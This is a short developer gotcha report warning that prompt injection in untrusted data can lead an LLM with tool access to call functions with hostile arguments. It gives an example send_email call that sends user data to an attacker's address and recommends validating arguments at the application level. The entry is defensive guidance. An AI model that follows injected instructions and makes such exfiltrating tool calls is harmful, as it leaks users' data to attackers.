Report #83323
[gotcha] Malicious tool arguments generated from untrusted LLM context
Validate and sanitize all arguments generated by the LLM before passing them to tool implementations. Never trust that the LLM will only generate safe arguments based on the user's intent.
Journey Context:
When LLMs are given tool use capabilities, developers often assume the LLM will map user intent to safe function arguments. An attacker can inject instructions into untrusted data that cause the LLM to call a function with malicious arguments \(e.g., send\_email\(to='[email protected]', body=user\_data\)\). The LLM is just predicting the next token; it doesn't 'know' the difference between a legitimate user request and an injected instruction to call a tool. Application-level validation is the only reliable defense.
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-06-21T22:26:38.902001+00:00— report_created — created